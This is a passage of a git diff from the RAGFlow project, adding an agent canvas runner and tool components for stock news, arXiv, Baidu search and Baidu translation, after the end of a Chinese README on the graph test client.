||||
否则,正确配置 conf/service_conf.yaml 文件是必不可少的。
|
||||
|
||||
```bash
|
||||
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
|
||||
usage: client.py [-h] -s DSL -t TENANT_ID -m
|
||||
|
||||
options:
|
||||
-h, --help show this help message and exit
|
||||
-s DSL, --dsl DSL input dsl
|
||||
-t TENANT_ID, --tenant_id TENANT_ID
|
||||
Tenant ID
|
||||
-m, --stream Stream output
|
||||
```
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/05924730-c427-495b-8ee4-90b8b2250681" width="1000"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 命令行中的TENANT_ID如何获得?
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
|
||||
</div>
|
||||
💡 后面会展示在这里:
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
|
||||
</div>
|
||||
|
||||
|
||||
## DSL里面的Retrieval组件的kb_ids怎么填?
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
|
||||
</div>
|
||||
|
||||
0
agent/__init__.py
Normal file
0
agent/__init__.py
Normal file
305
agent/canvas.py
Normal file
305
agent/canvas.py
Normal file
@ -0,0 +1,305 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import importlib
|
||||
import json
|
||||
import traceback
|
||||
from abc import ABC
|
||||
from copy import deepcopy
|
||||
from functools import partial
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from agent.component import component_class
|
||||
from agent.component.base import ComponentBase
|
||||
from agent.settings import flow_logger, DEBUG
|
||||
|
||||
|
||||
class Canvas(ABC):
|
||||
"""
|
||||
dsl = {
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {},
|
||||
},
|
||||
"downstream": ["answer_0"],
|
||||
"upstream": [],
|
||||
},
|
||||
"answer_0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["retrieval_0"],
|
||||
"upstream": ["begin", "generate_0"],
|
||||
},
|
||||
"retrieval_0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["generate_0"],
|
||||
"upstream": ["answer_0"],
|
||||
},
|
||||
"generate_0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["answer_0"],
|
||||
"upstream": ["retrieval_0"],
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": [],
|
||||
"path": [["begin"]],
|
||||
"answer": []
|
||||
}
|
||||
"""
|
||||
|
||||
def __init__(self, dsl: str, tenant_id=None):
|
||||
self.path = []
|
||||
self.history = []
|
||||
self.messages = []
|
||||
self.answer = []
|
||||
self.components = {}
|
||||
self.dsl = json.loads(dsl) if dsl else {
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj": {
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": [],
|
||||
"upstream": []
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": [],
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
self._tenant_id = tenant_id
|
||||
self._embed_id = ""
|
||||
self.load()
|
||||
|
||||
def load(self):
|
||||
self.components = self.dsl["components"]
|
||||
cpn_nms = set([])
|
||||
for k, cpn in self.components.items():
|
||||
cpn_nms.add(cpn["obj"]["component_name"])
|
||||
|
||||
assert "Begin" in cpn_nms, "There have to be an 'Begin' component."
|
||||
assert "Answer" in cpn_nms, "There have to be an 'Answer' component."
|
||||
|
||||
for k, cpn in self.components.items():
|
||||
cpn_nms.add(cpn["obj"]["component_name"])
|
||||
param = component_class(cpn["obj"]["component_name"] + "Param")()
|
||||
param.update(cpn["obj"]["params"])
|
||||
param.check()
|
||||
cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)
|
||||
if cpn["obj"].component_name == "Categorize":
|
||||
for _, desc in param.category_description.items():
|
||||
if desc["to"] not in cpn["downstream"]:
|
||||
cpn["downstream"].append(desc["to"])
|
||||
|
||||
self.path = self.dsl["path"]
|
||||
self.history = self.dsl["history"]
|
||||
self.messages = self.dsl["messages"]
|
||||
self.answer = self.dsl["answer"]
|
||||
self.reference = self.dsl["reference"]
|
||||
self._embed_id = self.dsl.get("embed_id", "")
|
||||
|
||||
def __str__(self):
|
||||
self.dsl["path"] = self.path
|
||||
self.dsl["history"] = self.history
|
||||
self.dsl["messages"] = self.messages
|
||||
self.dsl["answer"] = self.answer
|
||||
self.dsl["reference"] = self.reference
|
||||
self.dsl["embed_id"] = self._embed_id
|
||||
dsl = {
|
||||
"components": {}
|
||||
}
|
||||
for k in self.dsl.keys():
|
||||
if k in ["components"]:continue
|
||||
dsl[k] = deepcopy(self.dsl[k])
|
||||
|
||||
for k, cpn in self.components.items():
|
||||
if k not in dsl["components"]:
|
||||
dsl["components"][k] = {}
|
||||
for c in cpn.keys():
|
||||
if c == "obj":
|
||||
dsl["components"][k][c] = json.loads(str(cpn["obj"]))
|
||||
continue
|
||||
dsl["components"][k][c] = deepcopy(cpn[c])
|
||||
return json.dumps(dsl, ensure_ascii=False)
|
||||
|
||||
def reset(self):
|
||||
self.path = []
|
||||
self.history = []
|
||||
self.messages = []
|
||||
self.answer = []
|
||||
self.reference = []
|
||||
for k, cpn in self.components.items():
|
||||
self.components[k]["obj"].reset()
|
||||
self._embed_id = ""
|
||||
|
||||
def run(self, **kwargs):
|
||||
ans = ""
|
||||
if self.answer:
|
||||
cpn_id = self.answer[0]
|
||||
self.answer.pop(0)
|
||||
try:
|
||||
ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
|
||||
except Exception as e:
|
||||
ans = ComponentBase.be_output(str(e))
|
||||
self.path[-1].append(cpn_id)
|
||||
if kwargs.get("stream"):
|
||||
assert isinstance(ans, partial)
|
||||
return ans
|
||||
self.history.append(("assistant", ans.to_dict("records")))
|
||||
return ans
|
||||
|
||||
if not self.path:
|
||||
self.components["begin"]["obj"].run(self.history, **kwargs)
|
||||
self.path.append(["begin"])
|
||||
|
||||
self.path.append([])
|
||||
ran = -1
|
||||
|
||||
def prepare2run(cpns):
|
||||
nonlocal ran, ans
|
||||
for c in cpns:
|
||||
if self.path[-1] and c == self.path[-1][-1]: continue
|
||||
cpn = self.components[c]["obj"]
|
||||
if cpn.component_name == "Answer":
|
||||
self.answer.append(c)
|
||||
else:
|
||||
if DEBUG: print("RUN: ", c)
|
||||
if cpn.component_name == "Generate":
|
||||
cpids = cpn.get_dependent_components()
|
||||
if any([c not in self.path[-1] for c in cpids]):
|
||||
continue
|
||||
ans = cpn.run(self.history, **kwargs)
|
||||
self.path[-1].append(c)
|
||||
ran += 1
|
||||
|
||||
prepare2run(self.components[self.path[-2][-1]]["downstream"])
|
||||
while 0 <= ran < len(self.path[-1]):
|
||||
if DEBUG: print(ran, self.path)
|
||||
cpn_id = self.path[-1][ran]
|
||||
cpn = self.get_component(cpn_id)
|
||||
if not cpn["downstream"]: break
|
||||
|
||||
loop = self._find_loop()
|
||||
if loop: raise OverflowError(f"Too much loops: {loop}")
|
||||
|
||||
if cpn["obj"].component_name.lower() in ["switch", "categorize", "relevant"]:
|
||||
switch_out = cpn["obj"].output()[1].iloc[0, 0]
|
||||
assert switch_out in self.components, \
|
||||
"{}'s output: {} not valid.".format(cpn_id, switch_out)
|
||||
try:
|
||||
prepare2run([switch_out])
|
||||
except Exception as e:
|
||||
for p in [c for p in self.path for c in p][::-1]:
|
||||
if p.lower().find("answer") >= 0:
|
||||
self.get_component(p)["obj"].set_exception(e)
|
||||
prepare2run([p])
|
||||
break
|
||||
traceback.print_exc()
|
||||
break
|
||||
continue
|
||||
|
||||
try:
|
||||
prepare2run(cpn["downstream"])
|
||||
except Exception as e:
|
||||
for p in [c for p in self.path for c in p][::-1]:
|
||||
if p.lower().find("answer") >= 0:
|
||||
self.get_component(p)["obj"].set_exception(e)
|
||||
prepare2run([p])
|
||||
break
|
||||
traceback.print_exc()
|
||||
break
|
||||
|
||||
if self.answer:
|
||||
cpn_id = self.answer[0]
|
||||
self.answer.pop(0)
|
||||
ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
|
||||
self.path[-1].append(cpn_id)
|
||||
if kwargs.get("stream"):
|
||||
assert isinstance(ans, partial)
|
||||
return ans
|
||||
|
||||
self.history.append(("assistant", ans.to_dict("records")))
|
||||
|
||||
return ans
|
||||
|
||||
def get_component(self, cpn_id):
|
||||
return self.components[cpn_id]
|
||||
|
||||
def get_tenant_id(self):
|
||||
return self._tenant_id
|
||||
|
||||
def get_history(self, window_size):
|
||||
convs = []
|
||||
for role, obj in self.history[(window_size + 1) * -1:]:
|
||||
convs.append({"role": role, "content": (obj if role == "user" else
|
||||
'\n'.join(pd.DataFrame(obj)['content']))})
|
||||
return convs
|
||||
|
||||
def add_user_input(self, question):
|
||||
self.history.append(("user", question))
|
||||
|
||||
def set_embedding_model(self, embed_id):
|
||||
self._embed_id = embed_id
|
||||
|
||||
def get_embedding_model(self):
|
||||
return self._embed_id
|
||||
|
||||
def _find_loop(self, max_loops=6):
|
||||
path = self.path[-1][::-1]
|
||||
if len(path) < 2: return False
|
||||
|
||||
for i in range(len(path)):
|
||||
if path[i].lower().find("answer") >= 0:
|
||||
path = path[:i]
|
||||
break
|
||||
|
||||
if len(path) < 2: return False
|
||||
|
||||
for l in range(2, len(path) // 2):
|
||||
pat = ",".join(path[0:l])
|
||||
path_str = ",".join(path)
|
||||
if len(pat) >= len(path_str): return False
|
||||
loop = max_loops
|
||||
while path_str.find(pat) == 0 and loop >= 0:
|
||||
loop -= 1
|
||||
if len(pat)+1 >= len(path_str):
|
||||
return False
|
||||
path_str = path_str[len(pat)+1:]
|
||||
if loop < 0:
|
||||
pat = " => ".join([p.split(":")[0] for p in path[0:l]])
|
||||
return pat + " => " + pat
|
||||
|
||||
return False
|
||||
|
||||
def get_prologue(self):
|
||||
return self.components["begin"]["obj"]._param.prologue
|
||||
35
agent/component/__init__.py
Normal file
35
agent/component/__init__.py
Normal file
@ -0,0 +1,35 @@
|
||||
import importlib
|
||||
from .begin import Begin, BeginParam
|
||||
from .generate import Generate, GenerateParam
|
||||
from .retrieval import Retrieval, RetrievalParam
|
||||
from .answer import Answer, AnswerParam
|
||||
from .categorize import Categorize, CategorizeParam
|
||||
from .switch import Switch, SwitchParam
|
||||
from .relevant import Relevant, RelevantParam
|
||||
from .message import Message, MessageParam
|
||||
from .rewrite import RewriteQuestion, RewriteQuestionParam
|
||||
from .keyword import KeywordExtract, KeywordExtractParam
|
||||
from .baidu import Baidu, BaiduParam
|
||||
from .duckduckgo import DuckDuckGo, DuckDuckGoParam
|
||||
from .wikipedia import Wikipedia, WikipediaParam
|
||||
from .pubmed import PubMed, PubMedParam
|
||||
from .arxiv import ArXiv, ArXivParam
|
||||
from .google import Google, GoogleParam
|
||||
from .bing import Bing, BingParam
|
||||
from .googlescholar import GoogleScholar, GoogleScholarParam
|
||||
from .deepl import DeepL, DeepLParam
|
||||
from .github import GitHub, GitHubParam
|
||||
from .baidufanyi import BaiduFanyi, BaiduFanyiParam
|
||||
from .qweather import QWeather, QWeatherParam
|
||||
from .exesql import ExeSQL, ExeSQLParam
|
||||
from .yahoofinance import YahooFinance, YahooFinanceParam
|
||||
from .wencai import WenCai, WenCaiParam
|
||||
from .jin10 import Jin10, Jin10Param
|
||||
from .tushare import TuShare, TuShareParam
|
||||
from .akshare import AkShare, AkShareParam
|
||||
|
||||
|
||||
def component_class(class_name):
|
||||
m = importlib.import_module("agent.component")
|
||||
c = getattr(m, class_name)
|
||||
return c
|
||||
56
agent/component/akshare.py
Normal file
56
agent/component/akshare.py
Normal file
@ -0,0 +1,56 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import pandas as pd
|
||||
import akshare as ak
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class AkShareParam(ComponentParamBase):
|
||||
"""
|
||||
Define the AkShare component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
|
||||
|
||||
class AkShare(ComponentBase, ABC):
|
||||
component_name = "AkShare"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = ",".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return AkShare.be_output("")
|
||||
|
||||
try:
|
||||
ak_res = []
|
||||
stock_news_em_df = ak.stock_news_em(symbol=ans)
|
||||
stock_news_em_df = stock_news_em_df.head(self._param.top_n)
|
||||
ak_res = [{"content": '<a href="' + i["新闻链接"] + '">' + i["新闻标题"] + '</a>\n 新闻内容: ' + i[
|
||||
"新闻内容"] + " \n发布时间:" + i["发布时间"] + " \n文章来源: " + i["文章来源"]} for index, i in stock_news_em_df.iterrows()]
|
||||
except Exception as e:
|
||||
return AkShare.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not ak_res:
|
||||
return AkShare.be_output("")
|
||||
|
||||
return pd.DataFrame(ak_res)
|
||||
79
agent/component/answer.py
Normal file
79
agent/component/answer.py
Normal file
@ -0,0 +1,79 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import random
|
||||
from abc import ABC
|
||||
from functools import partial
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class AnswerParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Answer component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.post_answers = []
|
||||
|
||||
def check(self):
|
||||
return True
|
||||
|
||||
|
||||
class Answer(ComponentBase, ABC):
|
||||
component_name = "Answer"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
if kwargs.get("stream"):
|
||||
return partial(self.stream_output)
|
||||
|
||||
ans = self.get_input()
|
||||
if self._param.post_answers:
|
||||
ans = pd.concat([ans, pd.DataFrame([{"content": random.choice(self._param.post_answers)}])], ignore_index=False)
|
||||
return ans
|
||||
|
||||
def stream_output(self):
|
||||
res = None
|
||||
if hasattr(self, "exception") and self.exception:
|
||||
res = {"content": str(self.exception)}
|
||||
self.exception = None
|
||||
yield res
|
||||
self.set_output(res)
|
||||
return
|
||||
|
||||
stream = self.get_stream_input()
|
||||
if isinstance(stream, pd.DataFrame):
|
||||
res = stream
|
||||
answer = ""
|
||||
for ii, row in stream.iterrows():
|
||||
answer += row.to_dict()["content"]
|
||||
yield {"content": answer}
|
||||
else:
|
||||
for st in stream():
|
||||
res = st
|
||||
yield st
|
||||
if self._param.post_answers:
|
||||
res["content"] += random.choice(self._param.post_answers)
|
||||
yield res
|
||||
|
||||
self.set_output(res)
|
||||
|
||||
def set_exception(self, e):
|
||||
self.exception = e
|
||||
|
||||
|
||||
69
agent/component/arxiv.py
Normal file
69
agent/component/arxiv.py
Normal file
@ -0,0 +1,69 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import arxiv
|
||||
import pandas as pd
|
||||
from agent.settings import DEBUG
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class ArXivParam(ComponentParamBase):
|
||||
"""
|
||||
Define the ArXiv component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 6
|
||||
self.sort_by = 'submittedDate'
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_valid_value(self.sort_by, "ArXiv Search Sort_by",
|
||||
['submittedDate', 'lastUpdatedDate', 'relevance'])
|
||||
|
||||
|
||||
class ArXiv(ComponentBase, ABC):
|
||||
component_name = "ArXiv"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return ArXiv.be_output("")
|
||||
|
||||
try:
|
||||
sort_choices = {"relevance": arxiv.SortCriterion.Relevance,
|
||||
"lastUpdatedDate": arxiv.SortCriterion.LastUpdatedDate,
|
||||
'submittedDate': arxiv.SortCriterion.SubmittedDate}
|
||||
arxiv_client = arxiv.Client()
|
||||
search = arxiv.Search(
|
||||
query=ans,
|
||||
max_results=self._param.top_n,
|
||||
sort_by=sort_choices[self._param.sort_by]
|
||||
)
|
||||
arxiv_res = [
|
||||
{"content": 'Title: ' + i.title + '\nPdf_Url: <a href="' + i.pdf_url + '"></a> \nSummary: ' + i.summary} for
|
||||
i in list(arxiv_client.results(search))]
|
||||
except Exception as e:
|
||||
return ArXiv.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not arxiv_res:
|
||||
return ArXiv.be_output("")
|
||||
|
||||
df = pd.DataFrame(arxiv_res)
|
||||
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
|
||||
return df
|
||||
69
agent/component/baidu.py
Normal file
69
agent/component/baidu.py
Normal file
@ -0,0 +1,69 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import random
|
||||
from abc import ABC
|
||||
from functools import partial
|
||||
import pandas as pd
|
||||
import requests
|
||||
import re
|
||||
from agent.settings import DEBUG
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class BaiduParam(ComponentParamBase):
|
||||
"""
|
||||
Define the Baidu component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
|
||||
|
||||
class Baidu(ComponentBase, ABC):
|
||||
component_name = "Baidu"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return Baidu.be_output("")
|
||||
|
||||
try:
|
||||
url = 'https://www.baidu.com/s?wd=' + ans + '&rn=' + str(self._param.top_n)
|
||||
headers = {
|
||||
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'}
|
||||
response = requests.get(url=url, headers=headers)
|
||||
|
||||
url_res = re.findall(r"'url': \\\"(.*?)\\\"}", response.text)
|
||||
title_res = re.findall(r"'title': \\\"(.*?)\\\",\\n", response.text)
|
||||
body_res = re.findall(r"\"contentText\":\"(.*?)\"", response.text)
|
||||
baidu_res = [{"content": re.sub('<em>|</em>', '', '<a href="' + url + '">' + title + '</a> ' + body)} for
|
||||
url, title, body in zip(url_res, title_res, body_res)]
|
||||
del body_res, url_res, title_res
|
||||
except Exception as e:
|
||||
return Baidu.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not baidu_res:
|
||||
return Baidu.be_output("")
|
||||
|
||||
df = pd.DataFrame(baidu_res)
|
||||
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
|
||||
return df
|
||||
|
||||
99
agent/component/baidufanyi.py
Normal file
99
agent/component/baidufanyi.py
Normal file
@ -0,0 +1,99 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import random
|
||||
from abc import ABC
|
||||
import requests
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
from hashlib import md5
|
||||
|
||||
|
||||
class BaiduFanyiParam(ComponentParamBase):
|
||||
"""
|
||||
Define the BaiduFanyi component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.appid = "xxx"
|
||||
self.secret_key = "xxx"
|
||||
self.trans_type = 'translate'
|
||||
self.parameters = []
|
||||
self.source_lang = 'auto'
|
||||
self.target_lang = 'auto'
|
||||
self.domain = 'finance'
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_empty(self.appid, "BaiduFanyi APPID")
|
||||
self.check_empty(self.secret_key, "BaiduFanyi Secret Key")
|
||||
self.check_valid_value(self.trans_type, "Translate type", ['translate', 'fieldtranslate'])
|
||||
self.check_valid_value(self.trans_type, "Translate domain",
|
||||
['it', 'finance', 'machinery', 'senimed', 'novel', 'academic', 'aerospace', 'wiki',
|
||||
'news', 'law', 'contract'])
|
||||
self.check_valid_value(self.source_lang, "Source language",
|
||||
['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt',
|
||||
'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe',
|
||||
'hu', 'cht', 'vie'])
|
||||
self.check_valid_value(self.target_lang, "Target language",
|
||||
['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt',
|
||||
'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe',
|
||||
'hu', 'cht', 'vie'])
|
||||
self.check_valid_value(self.domain, "Translate field",
|
||||
['it', 'finance', 'machinery', 'senimed', 'novel', 'academic', 'aerospace', 'wiki',
|
||||
'news', 'law', 'contract'])
|
||||
|
||||
|
||||
class BaiduFanyi(ComponentBase, ABC):
|
||||
component_name = "BaiduFanyi"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return BaiduFanyi.be_output("")
|
||||
|
||||
try:
|
||||
source_lang = self._param.source_lang
|
||||
target_lang = self._param.target_lang
|
||||
appid = self._param.appid
|
||||
salt = random.randint(32768, 65536)
|
||||
secret_key = self._param.secret_key
|
||||
|
||||
if self._param.trans_type == 'translate':
|
||||
sign = md5((appid + ans + salt + secret_key).encode('utf-8')).hexdigest()
|
||||
url = 'http://api.fanyi.baidu.com/api/trans/vip/translate?' + 'q=' + ans + '&from=' + source_lang + '&to=' + target_lang + '&appid=' + appid + '&salt=' + salt + '&sign=' + sign
|
||||
headers = {"Content-Type": "application/x-www-form-urlencoded"}
|
||||
response = requests.post(url=url, headers=headers).json()
|
||||
|
||||
if response.get('error_code'):
|
||||
BaiduFanyi.be_output("**Error**:" + response['error_msg'])
|
||||
|
||||
return BaiduFanyi.be_output(response['trans_result'][0]['dst'])
|
||||
elif self._param.trans_type == 'fieldtranslate':
|
||||
domain = self._param.domain
|
||||
sign = md5((appid + ans + salt + domain + secret_key).encode('utf-8')).hexdigest()
|
||||
url = 'http://api.fanyi.baidu.com/api/trans/vip/fieldtranslate?' + 'q=' + ans + '&from=' + source_lang + '&to=' + target_lang + '&appid=' + appid + '&salt=' + salt + '&domain=' + domain + '&sign=' + sign
|
||||
headers = {"Content-Type": "application/x-www-form-urlencoded"}
|
||||
response = requests.post(url=url, headers=headers).json()
|
||||
|
||||
if response.get('error_code'):
|
||||
BaiduFanyi.be_output("**Error**:" + response['error_msg'])
|
||||
|
||||
return BaiduFanyi.be_output(response['trans_result'][0]['dst'])
|
||||
|
||||
except Exception as e:
|
||||
BaiduFanyi.be_output("**Error**:" + str(e))
|
||||
492
agent/component/base.py
Normal file
492
agent/component/base.py
Normal file
@ -0,0 +1,492 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import builtins
|
||||
import json
|
||||
import os
|
||||
from copy import deepcopy
|
||||
from functools import partial
|
||||
from typing import List, Dict, Tuple, Union
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from agent import settings
|
||||
from agent.settings import flow_logger, DEBUG
|
||||
|
||||
_FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
|
||||
_DEPRECATED_PARAMS = "_deprecated_params"
|
||||
_USER_FEEDED_PARAMS = "_user_feeded_params"
|
||||
_IS_RAW_CONF = "_is_raw_conf"
|
||||
|
||||
|
||||
class ComponentParamBase(ABC):
|
||||
def __init__(self):
|
||||
self.output_var_name = "output"
|
||||
self.message_history_window_size = 22
|
||||
|
||||
def set_name(self, name: str):
|
||||
self._name = name
|
||||
return self
|
||||
|
||||
def check(self):
|
||||
raise NotImplementedError("Parameter Object should be checked.")
|
||||
|
||||
@classmethod
|
||||
def _get_or_init_deprecated_params_set(cls):
|
||||
if not hasattr(cls, _DEPRECATED_PARAMS):
|
||||
setattr(cls, _DEPRECATED_PARAMS, set())
|
||||
return getattr(cls, _DEPRECATED_PARAMS)
|
||||
|
||||
def _get_or_init_feeded_deprecated_params_set(self, conf=None):
|
||||
if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
|
||||
if conf is None:
|
||||
setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
|
||||
else:
|
||||
setattr(
|
||||
self,
|
||||
_FEEDED_DEPRECATED_PARAMS,
|
||||
set(conf[_FEEDED_DEPRECATED_PARAMS]),
|
||||
)
|
||||
return getattr(self, _FEEDED_DEPRECATED_PARAMS)
|
||||
|
||||
def _get_or_init_user_feeded_params_set(self, conf=None):
|
||||
if not hasattr(self, _USER_FEEDED_PARAMS):
|
||||
if conf is None:
|
||||
